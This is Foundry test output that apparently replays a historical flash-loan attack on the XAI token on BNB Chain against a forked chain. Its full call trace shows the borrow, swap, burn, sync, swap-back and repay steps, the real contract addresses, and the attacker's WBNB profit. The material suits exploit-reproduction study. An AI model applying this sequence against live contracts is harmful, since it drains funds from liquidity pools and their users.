Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.29s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2023-11/XAI_exp.sol:28:5:
   |
28 |     IERC20 private constant WBNB = IERC20(0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
    --> src/test/interface.sol:2436:1:
     |
2436 | interface WBNB {
     | ^ (Relevant source part starts here and spans across multiple lines).

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-11/XAI_exp.sol:58:31:
   |
58 |     function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) external {
   |                               ^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-11/XAI_exp.sol:58:67:
   |
58 |     function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) external {
   |                                                                   ^^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-11/XAI_exp.sol:58:88:
   |
58 |     function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) external {
   |                                                                                        ^^^^^^^^^^^^^^^^^^^


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 493.27ms (5.53ms CPU time)

Ran 1 test for src/test/2023-11/XAI_exp.sol:XAIExploit
[PASS] testExploit() (gas: 429532)
Logs:
  Exploiter WBNB balance before attack: 0.000000000000000000
  Exploiter WBNB balance after attack: 0.530802178153884369

Traces:
  [9241] XAIExploit::setUp()
    ├─ [0] VM::createSelectFork("bsc", 33503556 [3.35e7])
    │   └─ ← [Return] 0
    ├─ [0] VM::label(WBNB: [0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c], "WBNB")
    │   └─ ← [Return]
    ├─ [0] VM::label(XAI: [0x570Ce7b89c67200721406525e1848bca6fF5A6F3], "XAI")
    │   └─ ← [Return]
    ├─ [0] VM::label(DPPOracle: [0xFeAFe253802b77456B4627F8c2306a9CeBb5d681], "DPPOracle")
    │   └─ ← [Return]
    ├─ [0] VM::label(PancakeRouter: [0x10ED43C718714eb63d5aA57B78B54704E256024E], "PancakeRouter")
    │   └─ ← [Return]
    ├─ [0] VM::label(XAI_WBNB: [0xe633c651e6B3F744e7DeD314CDb243cf606A5F5B], "XAI_WBNB")
    │   └─ ← [Return]
    └─ ← [Stop]

  [463432] XAIExploit::testExploit()
    ├─ [2534] WBNB::balanceOf(XAIExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [2444] WBNB::decimals() [staticcall]
    │   └─ ← [Return] 18
    ├─ emit log_named_decimal_uint(key: "Exploiter WBNB balance before attack", val: 0, decimals: 18)
    ├─ [25295] XAI::approve(PancakeRouter: [0x10ED43C718714eb63d5aA57B78B54704E256024E], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: XAIExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: PancakeRouter: [0x10ED43C718714eb63d5aA57B78B54704E256024E], value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─  storage changes:
    │   │   @ 0x9e278f814ad3ffbb7f027bc4ee8baeb253a935b12f796e4956a034ce49bfb589: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   └─ ← [Return] true
    ├─ [2534] WBNB::balanceOf(DPPOracle: [0xFeAFe253802b77456B4627F8c2306a9CeBb5d681]) [staticcall]
    │   └─ ← [Return] 2562001604398998683661 [2.562e21]
    ├─ [410958] DPPOracle::flashLoan(2562001604398998683661 [2.562e21], 0, XAIExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x5f)
    │   ├─ [25962] WBNB::transfer(XAIExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 2562001604398998683661 [2.562e21])
    │   │   ├─ emit Transfer(from: DPPOracle: [0xFeAFe253802b77456B4627F8c2306a9CeBb5d681], to: XAIExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 2562001604398998683661 [2.562e21])
    │   │   ├─  storage changes:
    │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x00000000000000000000000000000000000000000000008ae2ea2522772d000d
    │   │   │   @ 0x95870720a9b5a6420749f02df2d1248f9e2447dd5ed7a5b82d399a1b406f5197: 0x00000000000000000000000000000000000000000000008ae2ea2522772d000d → 0
    │   │   └─ ← [Return] true
    │   ├─ [358653] XAIExploit::DPPFlashLoanCall(XAIExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 2562001604398998683661 [2.562e21], 0, 0x5f)
    │   │   ├─ [24420] WBNB::approve(PancakeRouter: [0x10ED43C718714eb63d5aA57B78B54704E256024E], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   ├─ emit Approval(owner: XAIExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: PancakeRouter: [0x10ED43C718714eb63d5aA57B78B54704E256024E], value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x0072fde0c25a54a99a0517f551c3cabc4c49d9ef3648fd789a3f57d0243cdb90: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   └─ ← [Return] true
    │   │   ├─ [534] WBNB::balanceOf(XAIExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 2562001604398998683661 [2.562e21]
    │   │   ├─ [207167] PancakeRouter::swapExactTokensForTokensSupportingFeeOnTransferTokens(2562001604398998683661 [2.562e21], 0, [0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c, 0x570Ce7b89c67200721406525e1848bca6fF5A6F3], XAIExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1700019887 [1.7e9])
    │   │   │   ├─ [8225] WBNB::transferFrom(XAIExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], XAI_WBNB: [0xe633c651e6B3F744e7DeD314CDb243cf606A5F5B], 2562001604398998683661 [2.562e21])
    │   │   │   │   ├─ emit Transfer(from: XAIExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: XAI_WBNB: [0xe633c651e6B3F744e7DeD314CDb243cf606A5F5B], value: 2562001604398998683661 [2.562e21])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x00000000000000000000000000000000000000000000008ae2ea2522772d000d → 0
    │   │   │   │   │   @ 0xd8479c1b8e3b38b7d05d24ae8b69a0a7bcae7dc01e5b6534da824cf4857b451c: 0x0000000000000000000000000000000000000000000000000f207539952d0000 → 0x00000000000000000000000000000000000000000000008af20a9a5c0c5a000d
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [13241] XAI::balanceOf(XAIExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   └─ ← [Return] 0
    │   │   │   ├─ [2893] XAI_WBNB::getReserves() [staticcall]
    │   │   │   │   └─ ← [Return] 100000000000000000000000000000 [1e29], 1090000000000000000 [1.09e18], 1700018878 [1.7e9]
    │   │   │   ├─ [534] WBNB::balanceOf(XAI_WBNB: [0xe633c651e6B3F744e7DeD314CDb243cf606A5F5B]) [staticcall]
    │   │   │   │   └─ ← [Return] 2563091604398998683661 [2.563e21]
    │   │   │   ├─ [169341] XAI_WBNB::swap(99957366694852838737841696701 [9.995e28], 0, XAIExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   │   ├─ [98057] XAI::transfer(XAIExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 99957366694852838737841696701 [9.995e28])
    │   │   │   │   │   ├─ emit Transfer(from: XAI_WBNB: [0xe633c651e6B3F744e7DeD314CDb243cf606A5F5B], to: 0xb9534Bca0c4660Ce085F2EfB2A6cDd73bA6FDA74, value: 999573666948528387378416967 [9.995e26])
    │   │   │   │   │   ├─ emit Transfer(from: XAI: [0x570Ce7b89c67200721406525e1848bca6fF5A6F3], to: 0x0000000000000000000000000000000000000000, value: 0)
    │   │   │   │   │   ├─ emit Transfer(from: XAI_WBNB: [0xe633c651e6B3F744e7DeD314CDb243cf606A5F5B], to: XAIExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 97958219360955781963084862767 [9.795e28])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x9e23003fca8256df233e1f650ba5113d5db750f10616784a07746a6e88a6f525: 0xfae147ae147ae147ae147ae147ae147ae147ae13fa6e91988cb8298000000000 → 0x001b61a0c87346a5c5fa7d215589442807a4a46844d70fda09b3e2766119cfee
    │   │   │   │   │   │   @ 15: 0xfae147ae147ae147ae147ae147ae147ae147ae13fa6e91988cb8298000000000 → 0xf5dd52705fc2686d66e0c29ae588505c56e98a9764592132ba682bda8f7ab854
    │   │   │   │   │   │   @ 16: 0x0000000000000000000000000000000000000000033b2e3c9fd0803ce8000000 → 0x000000000000000000000000000000000000000006760231b001505bea588d47
    │   │   │   │   │   │   @ 0x51472b8c9c2316503487aa1ec6814aa86baa1d0a833e5787bc35c44a907f07ac: 0x028f5c28f5c28f5c28f5c28f5c28f5c28f5c28f5c13fd2771b8ef0c000000000 → 0x051156c7d01ecbc94c8f9eb28d3bd7d1d48b3ab40c4a8aaa04b6ef92b842a3d6
    │   │   │   │   │   │   @ 18: 0x0000000000000000000000000000000000000000033b2e3c9fd0803ce8000000 → 0x000000000000000000000000000000000000000006760231b001505bea588d47
    │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0xf5c1f0cf974f21c7a0e645798fff0c344f44e62f1f821158b0b449642e60e866
    │   │   │   │   │   │   @ 0xd9a573c55c1c046beee11100f360193bb093e661b7f2aa6278372460bd0e76f7: 0x0000000000000000000000000000000000000000033b2e3c9fd0803ce8000000 → 0x000000000000000000000000000000000000000006760231b001505bea588d47
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [3241] XAI::balanceOf(XAI_WBNB: [0xe633c651e6B3F744e7DeD314CDb243cf606A5F5B]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 43502994093751897288319708 [4.35e25]
    │   │   │   │   ├─ [534] WBNB::balanceOf(XAI_WBNB: [0xe633c651e6B3F744e7DeD314CDb243cf606A5F5B]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 2563091604398998683661 [2.563e21]
    │   │   │   │   ├─ emit Sync(reserve0: 43502994093751897288319708 [4.35e25], reserve1: 2563091604398998683661 [2.563e21])
    │   │   │   │   ├─ emit Swap(sender: PancakeRouter: [0x10ED43C718714eb63d5aA57B78B54704E256024E], amount0In: 869688946590635130016409 [8.696e23], amount1In: 2562001604398998683661 [2.562e21], amount0Out: 99957366694852838737841696701 [9.995e28], amount1Out: 0, to: XAIExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 8: 0x65543abe0000000000000f207539952d00000001431e0fae6d7217caa0000000 → 0x65543ac700000000008af20a9a5c0c5a000d00000023fc1e0909a65721eba2dc
    │   │   │   │   │   @ 9: 0 → 0x000000000000000000000000000000000000000000006bdcb1f9a1831f3ded36
    │   │   │   │   │   @ 10: 0 → 0x00000000000000000000000000c03ed824b27ed3604b27ed3604b27ed3604b20
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [3241] XAI::balanceOf(XAIExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   └─ ← [Return] 99956497005906248102711680291 [9.995e28]
    │   │   │   └─ ← [Stop]
    │   │   ├─ [550] XAI::totalSupply() [staticcall]
    │   │   │   └─ ← [Return] 100000000000000000000000000000 [1e29]
    │   │   ├─ [6920] XAI::burn(99999999999999999999999995404 [9.999e28])
    │   │   │   ├─ emit Transfer(from: XAIExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x0000000000000000000000000000000000000000, value: 99999999999999999999999995404 [9.999e28])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0xf5c1f0cf974f21c7a0e645798fff0c344f44e62f1f821158b0b449642e60e866 → 0xf5c1f0cf974f21c7a0e645798fff0c344f44e62ddc6401aa434231998e60fa5a
    │   │   │   │   @ 14: 0x0000000000000000000000000000000000000001431e0fae6d7217caa0000000 → 4596
    │   │   │   └─ ← [Stop]
    │   │   ├─ [11687] XAI_WBNB::sync()
    │   │   │   ├─ [3241] XAI::balanceOf(XAI_WBNB: [0xe633c651e6B3F744e7DeD314CDb243cf606A5F5B]) [staticcall]
    │   │   │   │   └─ ← [Return] 1
    │   │   │   ├─ [534] WBNB::balanceOf(XAI_WBNB: [0xe633c651e6B3F744e7DeD314CDb243cf606A5F5B]) [staticcall]
    │   │   │   │   └─ ← [Return] 2563091604398998683661 [2.563e21]
    │   │   │   ├─ emit Sync(reserve0: 1, reserve1: 2563091604398998683661 [2.563e21])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 8: 0x65543ac700000000008af20a9a5c0c5a000d00000023fc1e0909a65721eba2dc → 0x65543ac700000000008af20a9a5c0c5a000d0000000000000000000000000001
    │   │   │   └─ ← [Stop]
    │   │   ├─ [3241] XAI::balanceOf(XAIExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 4594
    │   │   ├─ [87931] PancakeRouter::swapExactTokensForTokensSupportingFeeOnTransferTokens(4594, 0, [0x570Ce7b89c67200721406525e1848bca6fF5A6F3, 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c], XAIExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1700019887 [1.7e9])
    │   │   │   ├─ [34622] XAI::transferFrom(XAIExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], XAI_WBNB: [0xe633c651e6B3F744e7DeD314CDb243cf606A5F5B], 4594)
    │   │   │   │   ├─ emit Transfer(from: XAIExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xb9534Bca0c4660Ce085F2EfB2A6cDd73bA6FDA74, value: 45)
    │   │   │   │   ├─ emit Transfer(from: XAI: [0x570Ce7b89c67200721406525e1848bca6fF5A6F3], to: 0x0000000000000000000000000000000000000000, value: 0)
    │   │   │   │   ├─ emit Transfer(from: XAIExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: XAI_WBNB: [0xe633c651e6B3F744e7DeD314CDb243cf606A5F5B], value: 4504)
    │   │   │   │   ├─ emit Approval(owner: XAIExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: PancakeRouter: [0x10ED43C718714eb63d5aA57B78B54704E256024E], value: 115792089237316195423570985008687907853269984665640564039457584007913129635341 [1.157e77])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x9e23003fca8256df233e1f650ba5113d5db750f10616784a07746a6e88a6f525: 0x001b61a0c87346a5c5fa7d215589442807a4a46844d70fda09b3e2766119cfee → 0xf10cc8075514d3f9974d47df01ab7b4a98f8e8f0274a7b062e384595a4d9ff8e
    │   │   │   │   │   @ 15: 0xf5dd52705fc2686d66e0c29ae588505c56e98a9764592132ba682bda8f7ab854 → 0xf10cca23faf5be9cb8bf9e0ad4568598b17356bfdfb5a1376a8ee77c6139273c
    │   │   │   │   │   @ 16: 0x000000000000000000000000000000000000000006760231b001505bea588d47 → 0x000000000000000000000000000000000000000006760231b001505bea588d74
    │   │   │   │   │   @ 18: 0x000000000000000000000000000000000000000006760231b001505bea588d47 → 0x000000000000000000000000000000000000000006760231b001505bea588d74
    │   │   │   │   │   @ 0x51472b8c9c2316503487aa1ec6814aa86baa1d0a833e5787bc35c44a907f07ac: 0x051156c7d01ecbc94c8f9eb28d3bd7d1d48b3ab40c4a8aaa04b6ef92b842a3d6 → 0x07799aee028520b1a3a030fa95d4bd33a746549fce9c4aa7aca391c1cf636c62
    │   │   │   │   │   @ 0xd9a573c55c1c046beee11100f360193bb093e661b7f2aa6278372460bd0e76f7: 0x000000000000000000000000000000000000000006760231b001505bea588d47 → 0x000000000000000000000000000000000000000006760231b001505bea588d74
    │   │   │   │   │   @ 0x9e278f814ad3ffbb7f027bc4ee8baeb253a935b12f796e4956a034ce49bfb589: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffee0d
    │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0xf5c1f0cf974f21c7a0e645798fff0c344f44e62ddc6401aa434231998e60fa5a → 0x0000021ca5e0eaa32172562bd2ab0a4e187a6dce754d1682cee48a1c1c5f39a2
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [534] WBNB::balanceOf(XAIExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   └─ ← [Return] 0
    │   │   │   ├─ [893] XAI_WBNB::getReserves() [staticcall]
    │   │   │   │   └─ ← [Return] 1, 2563091604398998683661 [2.563e21], 1700018887 [1.7e9]
    │   │   │   ├─ [3241] XAI::balanceOf(XAI_WBNB: [0xe633c651e6B3F744e7DeD314CDb243cf606A5F5B]) [staticcall]
    │   │   │   │   └─ ← [Return] 4595
    │   │   │   ├─ [40965] XAI_WBNB::swap(0, 2562532406577152568030 [2.562e21], XAIExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   │   ├─ [23162] WBNB::transfer(XAIExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 2562532406577152568030 [2.562e21])
    │   │   │   │   │   ├─ emit Transfer(from: XAI_WBNB: [0xe633c651e6B3F744e7DeD314CDb243cf606A5F5B], to: XAIExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 2562532406577152568030 [2.562e21])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xd8479c1b8e3b38b7d05d24ae8b69a0a7bcae7dc01e5b6534da824cf4857b451c: 0x00000000000000000000000000000000000000000000008af20a9a5c0c5a000d → 0x00000000000000000000000000000000000000000000000007c2ab74ca4f552f
    │   │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x00000000000000000000000000000000000000000000008aea47eee7420aaade
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [3241] XAI::balanceOf(XAI_WBNB: [0xe633c651e6B3F744e7DeD314CDb243cf606A5F5B]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 4595
    │   │   │   │   ├─ [534] WBNB::balanceOf(XAI_WBNB: [0xe633c651e6B3F744e7DeD314CDb243cf606A5F5B]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 559197821846115631 [5.591e17]
    │   │   │   │   ├─ emit Sync(reserve0: 4595, reserve1: 559197821846115631 [5.591e17])
    │   │   │   │   ├─ emit Swap(sender: PancakeRouter: [0x10ED43C718714eb63d5aA57B78B54704E256024E], amount0In: 4594, amount1In: 0, amount0Out: 0, amount1Out: 2562532406577152568030 [2.562e21], to: XAIExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 8: 0x65543ac700000000008af20a9a5c0c5a000d0000000000000000000000000001 → 0x65543ac700000000000007c2ab74ca4f552f00000000000000000000000011f3
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [534] WBNB::balanceOf(XAIExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   └─ ← [Return] 2562532406577152568030 [2.562e21]
    │   │   │   └─ ← [Stop]
    │   │   ├─ [3262] WBNB::transfer(DPPOracle: [0xFeAFe253802b77456B4627F8c2306a9CeBb5d681], 2562001604398998683661 [2.562e21])
    │   │   │   ├─ emit Transfer(from: XAIExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: DPPOracle: [0xFeAFe253802b77456B4627F8c2306a9CeBb5d681], value: 2562001604398998683661 [2.562e21])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x95870720a9b5a6420749f02df2d1248f9e2447dd5ed7a5b82d399a1b406f5197: 0 → 0x00000000000000000000000000000000000000000000008ae2ea2522772d000d
    │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x00000000000000000000000000000000000000000000008aea47eee7420aaade → 0x000000000000000000000000000000000000000000000000075dc9c4caddaad1
    │   │   │   └─ ← [Return] true
    │   │   └─ ← [Stop]
    │   ├─ [534] WBNB::balanceOf(DPPOracle: [0xFeAFe253802b77456B4627F8c2306a9CeBb5d681]) [staticcall]
    │   │   └─ ← [Return] 2562001604398998683661 [2.562e21]
    │   ├─ [2531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(DPPOracle: [0xFeAFe253802b77456B4627F8c2306a9CeBb5d681]) [staticcall]
    │   │   └─ ← [Return] 3408695997235812889583 [3.408e21]
    │   ├─ [534] WBNB::balanceOf(DPPOracle: [0xFeAFe253802b77456B4627F8c2306a9CeBb5d681]) [staticcall]
    │   │   └─ ← [Return] 2562001604398998683661 [2.562e21]
    │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(DPPOracle: [0xFeAFe253802b77456B4627F8c2306a9CeBb5d681]) [staticcall]
    │   │   └─ ← [Return] 3408695997235812889583 [3.408e21]
    │   ├─ emit DODOFlashLoan(: XAIExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : XAIExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : 2562001604398998683661 [2.562e21], : 0)
    │   ├─  storage changes:
    │   │   @ 0x95870720a9b5a6420749f02df2d1248f9e2447dd5ed7a5b82d399a1b406f5197: 0 → 0x00000000000000000000000000000000000000000000008ae2ea2522772d000d
    │   └─ ← [Stop]
    ├─ [534] WBNB::balanceOf(XAIExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 530802178153884369 [5.308e17]
    ├─ [444] WBNB::decimals() [staticcall]
    │   └─ ← [Return] 18
    ├─ emit log_named_decimal_uint(key: "Exploiter WBNB balance after attack", val: 530802178153884369 [5.308e17], decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 11.34s (9.88s CPU time)

Ran 2 test suites in 11.37s (11.83s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
